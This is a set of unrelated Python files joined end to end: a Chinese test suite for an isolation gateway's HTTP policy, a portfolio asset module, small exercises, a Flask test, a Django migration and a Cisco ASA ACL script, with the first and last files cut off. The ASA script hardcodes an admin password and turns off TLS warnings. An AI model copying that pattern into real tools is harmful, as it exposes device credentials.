back_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
assert back_res == 1
# 检查配置下发是否成功
for key in self.case1_step1:
re = fun.wait_data(self.case1_step1[key][0], 'FrontDut', self.case1_step1[key][1], '配置', 100)
print(re)
assert self.case1_step1[key][1] in re
for key in self.case1_step11:
re = fun.wait_data(self.case1_step11[key][0], 'FrontDut', self.case1_step11[key][1], '配置', 100)
print(re)
assert self.case1_step11[key][1] in re
# 发送get请求,验证隔离下的http策略
print('请求地址为{}'.format(self.http_url))
content = http_check.http_get(self.http_url)
print('验证隔离下的http策略请求内容为:{}'.format(content))
assert content == http_content
# 移除策略,清空环境
fun.send(rbmExc, message.delhttp_front['DelCustomAppPolicy'], FrontDomain, base_path)
fun.send(rbmExc, message.delhttp_back['DelCustomAppPolicy'], BackDomain, base_path)
fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
fdel_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
assert fdel_res == 1
fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
bdel_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
assert bdel_res == 1
# 检查策略移除是否成功
for key in self.case1_step1:
re = fun.wait_data(self.case1_step1[key][0], 'FrontDut', self.case1_step1[key][1], '配置', 100, flag='不存在')
print(re)
assert self.case1_step1[key][1] not in re
# @pytest.mark.skip(reseason="skip")
@allure.feature('验证隔离下的http策略下载一个10M大小的文件')
def test_iso_http_basic_a2(self):
# 下发配置
fun.send(rbmExc, message.addhttp_front['AddCustomAppPolicy'], FrontDomain, base_path)
fun.send(rbmExc, message.addhttp_back['AddCustomAppPolicy'], BackDomain, base_path)
fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
front_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
assert front_res == 1
fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
back_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
assert back_res == 1
# 检查配置下发是否成功
for key in self.case2_step1:
re = fun.wait_data(self.case2_step1[key][0], 'FrontDut', self.case2_step1[key][1], '配置', 100)
print(re)
assert self.case2_step1[key][1] in re
for key in self.case2_step11:
re = fun.wait_data(self.case2_step11[key][0], 'FrontDut', self.case2_step11[key][1], '配置', 100)
print(re)
assert self.case2_step11[key][1] in re
# 发送get请求,验证get请求是否正常
print('请求地址为{}'.format(http_url))
content = http_check.http_get(http_url)
print('验证隔离下的get请求内容为:{}'.format(content))
# 发送get请求,验证隔离下的http策略下载一个10M大小的文件
print('下载的服务器地址为{}'.format(self.downfile_url))
result = http_check.http_download(self.downfile_url, self.downlocalPath)
assert result == 1
#判断文件大小是否是10M
file_size = os.path.getsize(self.downlocalPath)
file_size = file_size / float(1024 * 1024) #将单位转化为M
assert 9.5 <= file_size <= 10.5
# 移除策略,清空环境
fun.send(rbmExc, message.delhttp_front['DelCustomAppPolicy'], FrontDomain, base_path)
fun.send(rbmExc, message.delhttp_back['DelCustomAppPolicy'], BackDomain, base_path)
fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
fdel_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
assert fdel_res == 1
fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
bdel_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
assert bdel_res == 1
# 检查策略移除是否成功
for key in self.case2_step1:
re = fun.wait_data(self.case2_step1[key][0], 'FrontDut', self.case2_step1[key][1], '配置', 100, flag='不存在')
print(re)
assert self.case2_step1[key][1] not in re
# @pytest.mark.skip(reseason="skip")
@allure.feature('验证隔离下的http策略上传一个10M大小的文件')
def test_iso_http_basic_a3(self):
# 下发配置
fun.send(rbmExc, message.addhttp_front_post['AddCustomAppPolicy'], FrontDomain, base_path)
fun.send(rbmExc, message.addhttp_back_post['AddCustomAppPolicy'], BackDomain, base_path)
fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
front_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
assert front_res == 1
fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
back_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
assert back_res == 1
# 检查配置下发是否成功
for key in self.case3_step1:
re = fun.wait_data(self.case3_step1[key][0], 'FrontDut', self.case3_step1[key][1], '配置', 100)
print(re)
assert self.case3_step1[key][1] in re
for key in self.case3_step11:
re = fun.wait_data(self.case3_step11[key][0], 'FrontDut', self.case3_step11[key][1], '配置', 100)
print(re)
assert self.case3_step11[key][1] in re
#初始化,检查server端无post.txt文件
post_file = fun.search('/home/lwq', 'txt', 'BG8010Server')
print(post_file)
if 'post.txt' in post_file:
fun.cmd('rm -f /home/lwq/post.txt ','BG8010Server')
#服务器端开启post上传服务
post_cmd = ['cd /home/lwq','python3 Server.py']
fun.cmd(post_cmd,'httpServer',thread=1,list_flag=True)
#发送post请求,验证post请求是否正常
print('请求地址为{}'.format(self.up_url))
content = http_check.http_post(self.up_url)
print('post普通请求的请求内容为:{}'.format(content))
# 发送post请求,验证隔离下的http策略上传一个10M大小的文件
print('上传的服务器地址为{}'.format(self.upfile_url))
result = http_check.http_upload(self.upfile_url, self.upfilename, self.uplocalPath, self.upMIME_type)
assert result == 1
#检查文件是否生成
post_file = fun.search('/home/lwq','txt','httpServer')
print('检查/home/lwq/目录下所有以txt结尾的文件列表为:{}'.format(post_file))
assert 'post.txt' in post_file
# 移除策略,清空环境
fun.send(rbmExc, message.delhttp_front_post['DelCustomAppPolicy'], FrontDomain, base_path)
fun.send(rbmExc, message.delhttp_back_post['DelCustomAppPolicy'], BackDomain, base_path)
fdel_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
assert fdel_res == 1
fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
bdel_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
assert bdel_res == 1
# 检查策略移除是否成功
for key in self.case3_step1:
re = fun.wait_data(self.case3_step1[key][0], 'FrontDut', self.case3_step1[key][1], '配置', 100, flag='不存在')
print(re)
assert self.case3_step1[key][1] not in re
def teardown_class(self):
# 回收环境
clr_env.iso_teardown_met('http', base_path)
clr_env.iso_teardown_met('http_post', base_path)
clr_env.iso_setup_class(dut='FrontDut')
clr_env.iso_setup_class(dut='BackDut')
fun.rbm_close()
fun.ssh_close('FrontDut')
fun.ssh_close('BackDut')
|
"""This module contains implementation of all the standard asset types.
The top-level interface which every asset type must implement is
lakshmi.assets.Asset. This class also contains helper functions that
operate on an asset type.
"""
import datetime
import re
from abc import ABC, abstractmethod
import requests
import yfinance
import lakshmi.constants
import lakshmi.utils as utils
from lakshmi.cache import Cacheable, cache
from lakshmi.table import Table
def to_dict(asset):
"""Returns a dictionary representation of asset.
This function is used to convert an 'asset' (aka a class implementing
lakshmi.assets.Asset interface) into a dictionary. This is mainly used
to serialize an asset type into a yaml-friendly format. The function
lakshmi.assets.from_dict is an inverse of this function.
Args:
asset: An object of a class implementating lakshmi.assets.Asset
interface.
Returns: A dictionary representation of asset.
"""
return {asset.__class__.__name__: asset.to_dict()}
def from_dict(d):
"""Converts a dictionary representing an asset into an asset object.
This function is reverse of lakshmi.assets.to_dict function.
Args:
d: A dictionary representating an asset type.
Returns: An object of class implementing lakshmi.assets.Asset interface
corresponding to d.
Raises: AssertionError if dict doesn't represent a lakshmi asset type.
"""
keys = list(d.keys())
assert len(keys) == 1
class_name = keys[0]
for c in CLASSES:
if c.__name__ == class_name:
return c.from_dict(d.pop(class_name))
raise AssertionError(f'Class {class_name} not found.')
class Asset(ABC):
"""Top-level class representing an asset (fund, ETF, cash, etc.).
Every asset type in lakshmi must inherit from this class.
"""
def __init__(self, class2ratio):
"""
Args:
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
Raises: AssertionError if ratio is not in (0, 1] or if the sum of
ratio across all class_name is not equal to 1.
"""
self._delta = 0
self.class2ratio = class2ratio
total = 0
for ratio in class2ratio.values():
assert ratio > 0.0 and ratio <= 1.0, (
f'Bad Class ratio provided to Asset ({ratio})')
total += ratio
assert abs(total - 1.0) < 1e-6, (
'Total allocation to classes must be 100% (actual = '
f'{total * 100}%)')
def to_dict(self):
"""Encodes this object into a dictionary.
Convention: This method for non-abstract (leaf) Asset classes encodes
all the fields present in the object. This method for abstract Asset
classes only encodes fields that are not passed in the constructor
during initialization of the object (encoding those fields is the
responsibility of the sub-class).
Returns: A dictionary object representing self.
"""
if self._delta != 0:
return {'What if': self._delta}
return dict()
def from_dict(self, d):
"""Reverse of to_dict.
This function initializes the object of this class given a dictionary.
Convention: This method for non-abstract Asset classes is a factory
method (static function) that initializes and returns a new object.
This method for abstract Asset classes decodes non-constructor data (if
any) and modifies self.
Args:
d: A dictionary representing self.
Returns: An object initialized with fields present in d.
"""
self.what_if(d.pop('What if', 0))
return self
def to_table(self):
"""Returns a table representing this object.
This function converts self object into a table
suitable for pretty-printing.
Returns: lakshmi.table.Table object representing the data in this
class.
"""
table = Table(2).add_row(['Name:', f'{self.name()}'])
asset_mapping_table = Table(2, coltypes=['str', 'percentage'])
for asset_class, ratio in self.class2ratio.items():
asset_mapping_table.add_row([f'{asset_class}', ratio])
table.add_row(['Asset Class Mapping:',
f'{asset_mapping_table.string(tablefmt="plain")}'])
if self._delta:
table.add_row(['Adjusted Value:',
f'{utils.format_money(self.adjusted_value())}'])
table.add_row(
['What if:', f'{utils.format_money_delta(self._delta)}'])
else:
table.add_row(
['Value:', f'{utils.format_money(self.adjusted_value())}'])
return table
def string(self):
"""Returns a string representation of this object."""
return self.to_table().string(tablefmt='plain')
def what_if(self, delta):
"""Adds delta (what if) to the adjusted value of this asset.
This function is provided to all assets and adds delta
to the adjusted value (without changing number of shares, etc.). This
is used to check how the asset allocation etc. would change if the
value of this asset is changed. After verifying the changes, it's
really easy to undo the changes by a call to what_if(-delta). A
bit of warning: what_if(100) followed by what_if(100) will add
200 to the value (i.e. the call doesn't reset any existing deltas
that are already added to the value.
Args:
delta: A float to be added to the total value.
"""
self._delta += delta
if abs(self._delta) < 1e-6:
self._delta = 0
def get_what_if(self):
"""Returns any what ifs (delta) that are added to the value."""
return self._delta
def adjusted_value(self):
"""Returns the adjusted value (after adding any what ifs)."""
return max(0, self.value() + self.get_what_if())
@abstractmethod
def value(self):
"""Returns the value of this asset."""
pass
@abstractmethod
def name(self):
"""Returns the full name of this asset."""
pass
@abstractmethod
def short_name(self):
"""Returns the short name of this asset (ideally < 10 chars)."""
pass
class ManualAsset(Asset):
"""This is a special catch-all asset type that represents an asset whose
value is manually specified and is not updated automatically."""
def __init__(self, name, value, class2ratio):
"""
Args:
name: Full name of this asset (also is used as short name).
value: The current value (in dollars, float) of this asset.
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
Raises: AssertionError if value is negative.
"""
assert value >= 0, 'Value of an asset can not be negative.'
self._name = name
self._value = value
super().__init__(class2ratio)
def to_dict(self):
"""Returns a dict representing this object."""
d = {'Name': self._name,
'Value': self._value,
'Asset Mapping': self.class2ratio}
d.update(super().to_dict())
return d
@classmethod
def from_dict(cls, d):
"""Returns a new object specified by dictionary d.
This is reverse of to_dict.
Args:
d: A dictionary (usually the output of to_dict).
Returns: A new ManualAsset object.
Raises: AssertionError if d cannot be parsed correctly.
"""
ret_obj = ManualAsset(d.pop('Name'),
d.pop('Value', 0),
d.pop('Asset Mapping'))
Asset.from_dict(ret_obj, d)
assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
return ret_obj
def value(self):
"""Returns value of this asset."""
return self._value
def name(self):
"""Returns name of this asset."""
return self._name
def short_name(self):
"""Returns short name (same as name) of this asset."""
return self._name
class TaxLot:
"""Class representing a single tax lot for an Asset."""
def __init__(self, date, quantity, unit_cost):
"""
Args:
date: String representing date (YYYY/MM/DD) on which this lot was
bought.
quantity: Number of shares bought on date.
unit_cost: Price per share.
Raises: AssertionError if date is not in the right format.
"""
# Do some sanity check.
date_pattern = re.compile('\\d{4}/\\d{2}/\\d{2}')
assert date_pattern.match(
date), 'Tax lot dates should be in format YYYY/MM/DD'
self.date = date
self.quantity = quantity
self.unit_cost = unit_cost
def to_dict(self):
"""Converts this object into a dictionary."""
return {'Date': self.date,
'Quantity': self.quantity,
'Unit Cost': self.unit_cost}
@classmethod
def from_dict(cls, d):
"""Factory method to return a new object representing a dictionary.
This is reverse of to_dict. This function returns a newly initialized
TaxLot object corresponding to d.
Args:
d: A dictionary representing TaxLot (usually output of to_dict)
Returns: An initialied TaxLot object corresponding to d.
Raises: AssertionError if d can't be parsed properly.
"""
ret_obj = TaxLot(d.pop('Date'), d.pop('Quantity'), d.pop('Unit Cost'))
assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
return ret_obj
class TradedAsset(Asset):
"""Abstract class representing an asset that is traded on stock market.
This asset is assumed to have 'shares' and per unit price and can
optionally have tax lots."""
def __init__(self, shares, class2ratio):
"""
Args:
shares: Number of shares of this asset.
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
"""
self._shares = shares
self._tax_lots = None
super().__init__(class2ratio)
def to_dict(self):
"""Converts this asset into a dictionary."""
d = dict()
if self._tax_lots:
d.update({'Tax Lots': [lot.to_dict() for lot in self._tax_lots]})
d.update(super().to_dict())
return d
def from_dict(self, d):
"""Initializes self with data provided via dictionary d."""
super().from_dict(d)
if 'Tax Lots' not in d:
return
tax_lots_list = [TaxLot.from_dict(lot_dict)
for lot_dict in d.pop('Tax Lots')]
self.set_lots(tax_lots_list)
return self
def shares(self):
"""Returns the number of shares."""
return self._shares
def get_lots(self):
"""Returns the tax lots or None if they are not set.
Returns: A list of TaxLot or None if not set.
"""
return self._tax_lots
def set_lots(self, tax_lots_list):
"""Sets the tax lots.
Args:
tax_lots_list: A list of TaxLot representing all the tax_lots.
Raises: AssertionError if the number of shares in the lots don't
sum up to the number of shares in this asset.
"""
sum_lots = sum([t.quantity for t in tax_lots_list])
assert abs(sum_lots - self._shares) < 1e-6, (
f'Lots provided should sum up to {self._shares}')
self._tax_lots = tax_lots_list
return self
def list_lots(self):
"""Returns a table of tax lots.
This function returns a Table of tax lots which can be used to
pretty-print the tax lot information.
Returns: lakshmi.table.Table object containing Date, Quantity,
Cost, Gain and Gain% fields for all the lots.
"""
table = Table(5,
headers=['Date', 'Quantity', 'Cost', 'Gain', 'Gain%'],
coltypes=['str', 'float', 'dollars', 'delta_dollars',
'percentage'])
if not self._tax_lots:
return table
for lot in self._tax_lots:
table.add_row(
[lot.date,
lot.quantity,
lot.unit_cost * lot.quantity,
(self.price() - lot.unit_cost) * lot.quantity,
self.price() / lot.unit_cost - 1])
return table
def to_table(self):
"""Returns this asset as a lakshmi.table.Table object."""
table = super().to_table()
table.add_row(['Price:', f'{utils.format_money(self.price())}'])
return table
def string(self):
"""Returns this asset as a string."""
if not self._tax_lots:
return super().string()
return (super().string() + '\n\nTax lots:\n'
+ f'{self.list_lots().string()}')
def value(self):
"""Returns the current market value of this asset."""
return self.shares() * self.price()
# This class inherits abstract methods Name & short_name from Asset.
@abstractmethod
def price(self):
"""Returns the current market value of this asset."""
pass
class NotFoundError(Exception):
pass
class TickerAsset(TradedAsset, Cacheable):
"""An asset class represented by a Ticker whose price can be pulled."""
def __init__(self, ticker, shares, class2ratio):
"""
Args:
ticker: Ticker of this asset (string),
shares: Total number of shares.
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
"""
self._ticker = ticker
session = requests.Session()
session.headers['user-agent'] = (
f'{lakshmi.constants.NAME}/{lakshmi.constants.VERSION}')
self.yticker = yfinance.Ticker(ticker, session=session)
super().__init__(shares, class2ratio)
def to_dict(self):
"""Returns a dict representing this object."""
d = {'Ticker': self._ticker,
'Shares': self.shares(),
'Asset Mapping': self.class2ratio}
d.update(super().to_dict())
return d
@classmethod
def from_dict(cls, d):
"""Returns a new object specified by dictionary d.
This is reverse of to_dict.
Args:
d: A dictionary (usually the output of to_dict).
Returns: A new TradedAsset object.
Raises: AssertionError if d cannot be parsed correctly.
"""
ret_obj = TickerAsset(
d.pop('Ticker'),
d.pop('Shares'),
d.pop('Asset Mapping'))
TradedAsset.from_dict(ret_obj, d)
assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
return ret_obj
def to_table(self):
"""Returns a table representing this object.
This function converts this object into a table
suitable for pretty-printing.
Returns: lakshmi.table.Table object representing the data in this
class.
"""
table = super().to_table()
rows = table.list()
rows.insert(0, ['Ticker:', f'{self._ticker}'])
table.set_rows(rows)
return table
def cache_key(self):
"""Unique key used for caching return values."""
return self._ticker
@cache(365) # Name changes are rare.
def name(self):
"""Returns full name of this asset.
This function pulls the name corresponding to the ticker symbol
of this asset. The return value is cached for 365 days.
Returns: A string representing the name of this asset.
Raises: NonFoundError if the ticker is not found.
"""
if self.yticker.info.get('longName') is None:
raise NotFoundError(
f'Cannot retrieve ticker ("{self._ticker}") '
'from Yahoo Finance')
return self.yticker.info['longName']
def short_name(self):
"""Returns the short name (ticker) of this object."""
return self._ticker
@cache(1)
def price(self):
"""Returns the market price of this asset.
The return price is cached for a day.
Returns: Price (float).
Raises: NotFoundError if the ticker is not found.
"""
if self.yticker.info.get('regularMarketPrice') is None:
raise NotFoundError(
f'Cannot retrieve ticker ("{self._ticker}") '
'from Yahoo Finance')
return self.yticker.info['regularMarketPrice']
class VanguardFund(TradedAsset, Cacheable):
"""An asset class representing Vanguard trust fund represented by a
numeric ID."""
def __init__(self, fund_id, shares, class2ratio):
"""
Args:
fund_id: Integer representing the Fund Id.
shares: Number of shares of this fund.
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
"""
self._fund_id = fund_id
super().__init__(shares, class2ratio)
def to_dict(self):
"""Returns a dict representing this object."""
d = {'Fund Id': self._fund_id,
'Shares': self.shares(),
'Asset Mapping': self.class2ratio}
d.update(super().to_dict())
return d
@classmethod
def from_dict(cls, d):
"""Returns a new object specified by dictionary d.
This is reverse of to_dict.
Args:
d: A dictionary (usually the output of to_dict).
Returns: A new VanguardFund object.
Raises: AssertionError if d cannot be parsed correctly.
"""
ret_obj = VanguardFund(
d.pop('Fund Id'),
d.pop('Shares'),
d.pop('Asset Mapping'))
TradedAsset.from_dict(ret_obj, d)
assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
return ret_obj
def to_table(self):
"""Returns this asset as a lakshmi.table.Table object."""
table = super().to_table()
rows = table.list()
rows.insert(0, ['Fund id:', f'{self._fund_id}'])
table.set_rows(rows)
return table
def cache_key(self):
"""Unique key used for caching return values."""
return str(self._fund_id)
@cache(365) # Name changes are very rare.
def name(self):
"""Returns full name of this asset.
This function returns the name of the fund corresponding to
the fund id. The returned name is cached for 365 days.
Returns: A string representing the name of this asset.
Raises: AssertionError if the name cannot be fatched.
"""
req = requests.get(
f'https://api.vanguard.com/rs/ire/01/pe/fund/{self._fund_id}'
'/profile.json',
headers={'Referer': 'https://vanguard.com/'})
req.raise_for_status() # Raise if error
return req.json()['fundProfile']['longName']
def short_name(self):
"""Returns the short name (fund id, string) of this object."""
return str(self._fund_id)
@cache(1)
def price(self):
"""Returns the market price of this asset.
The return price is cached for a day.
Returns: Price (float).
Raises: AssertionError in case the price cannot be fetched.
"""
req = requests.get(
f'https://api.vanguard.com/rs/ire/01/pe/fund/{self._fund_id}'
'/price.json',
headers={'Referer': 'https://vanguard.com/'})
req.raise_for_status() # Raise if error
return float(req.json()['currentPrice']
['dailyPrice']['regular']['price'])
class _TreasuryBonds(Asset):
"""Class representing a collection of I or EE bonds."""
class Bond(Cacheable):
"""A class representing individual I or EE Bond."""
def __init__(self, series, issue_date, denom):
"""
Args:
series: Type of Bond, either 'I' or 'EE'.
issue_date: String representing the issue month, in MM/YYYY
format.
denom: The denomination of this bond.
"""
self.series = series
self.issue_date = issue_date
self.denom = denom
self.redemption_date = datetime.datetime.now().strftime('%m/%Y')
def cache_key(self):
"""Unique key used for caching return values."""
return '{}_{}_{}'.format(
self.series,
self.issue_date.replace('/', '.'),
self.redemption_date.replace('/', '.'))
@cache(32) # The value of a Bond doesn't change in a month.
def _get_bond_info(self):
"""Returns the rate and value of a $1000 bond.
Returns: A tuple representing the percentage rate and
the current dollar value.
"""
data = {
'RedemptionDate': self.redemption_date,
'Series': self.series,
'Denomination': '1000',
'IssueDate': self.issue_date,
'btnAdd.x': 'CALCULATE'
}
req = requests.post(
'http://www.treasurydirect.gov/BC/SBCPrice', data=data)
req.raise_for_status()
ret_vals = re.findall('\n<td>.*</td>', req.text)
rate = re.sub('\n|<[^>]+>', '', ret_vals[6])
value = float(re.sub('\n|\\$|,|<[^>]+>', '', ret_vals[7]))
# EE Bonds returned are half the value (I guess TD website
# assumes paper bonds)
return rate, value * (2.0 if self.series == 'EE' else 1.0)
def value(self):
"""Returns the current value of this bond."""
unused_rate, value = self._get_bond_info()
return value * (self.denom / 1000.0)
def rate(self):
"""Returns the current percentage rate of this bond."""
rate, unused_value = self._get_bond_info()
return rate
def as_list(self):
"""Returns this bond as a list.
Returns: A list of Issue date, denomination, rate (as percentage)
and current value.
"""
rate, value = self._get_bond_info()
value *= (self.denom / 1000.0)
return [self.issue_date, self.denom, rate, value]
def __init__(self, series, class2ratio):
"""
Args:
series: The type of the bonds, either 'I' or 'EE'.
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
"""
self._series = series
super().__init__(class2ratio)
self._bonds = []
def to_dict(self):
"""Returns a dict representing this object."""
d = {}
d['Bonds'] = []
for bond in self._bonds:
d['Bonds'].append(
{'Issue Date': bond.issue_date, 'Denomination': bond.denom})
d.update(super().to_dict())
return d
def from_dict(self, d):
"""Returns a new object specified by dictionary d.
This is reverse of to_dict.
Args:
d: A dictionary (usually the output of to_dict).
Returns: A new _TreasuryBonds object.
Raises: AssertionError if d cannot be parsed correctly.
"""
for bond in d.pop('Bonds'):
self.add_bond(bond.pop('Issue Date'), bond.pop('Denomination'))
assert len(bond) == 0, ('Extra attributes found: '
f'{list(bond.keys())}')
Asset.from_dict(self, d)
return self
def bonds(self):
"""Returns all bonds as list.
Returns: A lot of self.Bond objects.
"""
return self._bonds
def add_bond(self, issue_date, denom):
"""Adds a new bond to this asset.
Args:
issue_date: String representing the issue date (in MM/YYYY format)
denom: The denomination of this bond.
"""
self._bonds.append(self.Bond(self._series, issue_date, denom))
return self
def value(self):
"""Returns the current market value of all the bonds."""
value = 0.0
for bond in self._bonds:
value += bond.value()
return value
def list_bonds(self):
"""Returns all bonds as a table.
Returns: A lakshmi.table.Table contains all the bonds in this asset.
The columns correspond to Issue Date, Denomination, Rate as
percentage, and current market value.
"""
table = Table(
4,
headers=['Issue Date', 'Denom', 'Rate', 'Value'],
coltypes=['str', 'dollars', 'str', 'dollars'])
for bond in self._bonds:
table.add_row(bond.as_list())
return table
def string(self):
"""Returns this asset as string."""
return (super().string() + '\n\nBonds:\n'
+ f'{self.list_bonds().string()}')
def name(self):
"""Returns the name of this asset (either 'I Bonds' or 'EE Bonds')."""
return f'{self._series} Bonds'
def short_name(self):
"""Returns short name (same as name)."""
return self.name()
class IBonds(_TreasuryBonds):
"""Class representing a collection of I Bonds."""
def __init__(self, class2ratio):
"""
Args:
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
"""
super().__init__('I', class2ratio)
def to_dict(self):
"""Returns a dict representing this object."""
d = {'Asset Mapping': self.class2ratio}
d.update(super().to_dict())
return d
@classmethod
def from_dict(cls, d):
"""Returns a new object specified by dictionary d."""
ret_obj = IBonds(d.pop('Asset Mapping'))
_TreasuryBonds.from_dict(ret_obj, d)
assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
return ret_obj
class EEBonds(_TreasuryBonds):
def __init__(self, class2ratio):
"""
Args:
class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
"""
super().__init__('EE', class2ratio)
def to_dict(self):
"""Returns a dict representing this object."""
d = {'Asset Mapping': self.class2ratio}
d.update(super().to_dict())
return d
@classmethod
def from_dict(cls, d):
"""Returns a new object specified by dictionary d."""
ret_obj = EEBonds(d.pop('Asset Mapping'))
_TreasuryBonds.from_dict(ret_obj, d)
assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
return ret_obj
# A list of all the assets type (classes) defined in this module.
CLASSES = [ManualAsset, TickerAsset, VanguardFund, IBonds, EEBonds]
|
x, y = map(int, input().split())
def calc(x, y):
return x + y, x - y, x * y, x / y
a, s, m, d = calc(x,y)
print('덧셈: {0}, 뺄셈: {1}, 곱셈: {2}, 나눗셈: {3}'.format(a, s, m, d)) |
# 1. Consider the following Python function.
def mystery(l):
if l == []:
return(l)
else:
return(mystery(l[1:])+l[:1])
# What does mystery([22,34,18,57,92,45]) return?
# Ans: [45, 92, 57, 18, 34, 22]
# 2. What is the value of pairs after the following assignment?
pairs = [ (x,y) for x in range(5,1,-1) for y in range(4,1,-1) if (x+y)%3 == 0 ]
# Ans: [(5, 4), (4, 2), (3, 3), (2, 4)]
# 3. Consider the following dictionary.
wickets = {"Tests":{"Ishant":[3,5,2,3],"Shami":[4,4,1,0],"Bumrah":[2,1,7,4]},"ODI":{"Ishant":[2,0],"Shami":[1,2]}}
# Which of the following statements does not generate an error?
# Options:-
# wickets["ODI"]["Bumrah"][0:] = [4,4]
# wickets["ODI"]["Bumrah"].extend([4,4])
# wickets["ODI"]["Bumrah"] = [4,4]
# wickets["ODI"]["Bumrah"] = wickets["ODI"]["Bumrah"] + [4,4]
# Ans: wickets["ODI"]["Bumrah"] = [4,4]
# 4. Assume that hundreds has been initialized as an empty dictionary:
hundreds = {}
# Which of the following generates an error?
# Options:-
# hundreds["Tendulkar, international"] = 100
# hundreds["Tendulkar"] = {"international":100}
# hundreds[("Tendulkar","international")] = 100
# hundreds[["Tendulkar","international"]] = 100
# Ans: hundreds[["Tendulkar","international"]] = 100 |
from execjs import get
import sys
import os.path as op
try:
from .rel import node_modules
except ImportError:
from rel import node_modules
rt = get('Node')
context = rt.compile('''
module.paths.push('%s');
function seePath(){
return module.paths;
}
var ng = require('ng-annotate');
function annotate(src,cfg){
return ng(src,cfg);
}''' % node_modules)
def ng_annotate(src,cfg=None):
return context.call('annotate',src,cfg or dict(add=True)).get('src',None)
coffee = '''
var app = angular.module('my.app',[]);
app.controller('TestCtrl',function($scope){
});
'''
def test():
print context.call('seePath')
def main():
print ng_annotate(open(sys.argv[-1],'r').read(),'')
if __name__ == "__main__":
main()
#test()
|
import json
from urllib3 import *
from base64 import b64encode
def create_acl(VLANID):
username = "admin"
password = "Cisc0123"
ip = "192.168.1.104"
disable_warnings()
http = PoolManager()
print('配置ACL')
object_name = "VLAN_" + str(VLANID) + "_HOST"
headers = {}
headers['Content-Type'] = 'application/json'
user_pass_str = username + ':' + password
user_pass_str_encode = user_pass_str.encode()
userAndPass = b64encode(user_pass_str_encode).decode("ascii")
headers["Authorization"] = 'Basic %s' % userAndPass
json_data = {
"sourceAddress": {
"kind": "AnyIPAddress",
"value": "any"
},
"destinationAddress": {
"kind": "objectRef#NetworkObj",
"objectId":object_name
},
"destinationService": {
"kind": "NetworkProtocol",
"value": "icmp"
},
"permit": True,
"active": True
}
url = 'https://' + ip + '/api/access/in/Outside/rules' # 请求的URL
r = http.request('POST', url, headers=headers, body=json.dumps(json_data)) # 使用POST发起请求,并且使用认证头部
print(r.data.decode())
if __name__ == "__main__":
create_acl(46) |
from models.user import UserModel
from tests.base_test import BaseTest
import json # convert our data into json{"key":"value",pair} format
class UserTest(BaseTest):
def test_register_user(self):
with self.app() as client:
with self.app_context():
response = client.post('/register', data={"username": "test", "password": '1234'})
self.assertEqual(response.status_code, 201)
self.assertIsNotNone(UserModel.find_by_username('test'))
self.assertDictEqual({"Message":"User created successfully"},json.loads(response.data))
def test_register_and_login(self):
with self.app() as client:
with self.app_context():
request = client.post('/register', data={"username": "test", "password": '1234'})
auth_response = client.post('/auth',data =json.dumps({'username':'test',
'password':'1234'}),
headers={"Content-Type":"application/json"})
self.assertIn("access_token",json.loads(auth_response.data).keys())
#send the token to this endpoint,require access token securely convert response data into json ,assuming the key wiill be a list,acces token is in the list
def test_register_duplicate(self):
with self.app() as client:
with self.app_context():
client.post('/register',data={'username':"test","password":"1234"})
response = client.post('/register', data={"username": "test", "password": '1234'})
self.assertEqual(response.status_code,400)
self.assertDictEqual({"Message":"A user with that username already"},json.loads(response.data))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-20 15:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('trading', '0007_auto_20160718_2253'),
]
operations = [
migrations.AlterField(
model_name='calls',
name='trade',
field=models.CharField(choices=[('BUY', 'BUY'), ('SELL', 'SELL')], default='BUY', max_length=4),
),
]
|
#PF-Prac-27
def check_for_ten(num1,num2):
#start writing your code here
return (num1 == 10 or num2 ==10) or (num1+num2==10)
print(check_for_ten(10,9)) |
import argparse
import torchvision.transforms as T
import torchvision
import torch.distributed as dist
import torch
from pathlib import Path
import os
import numpy as np
from torch.utils.tensorboard import SummaryWriter
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
def cuda(x):
return x.cuda() if torch.cuda.is_available() else x
def get_model(num_classes):
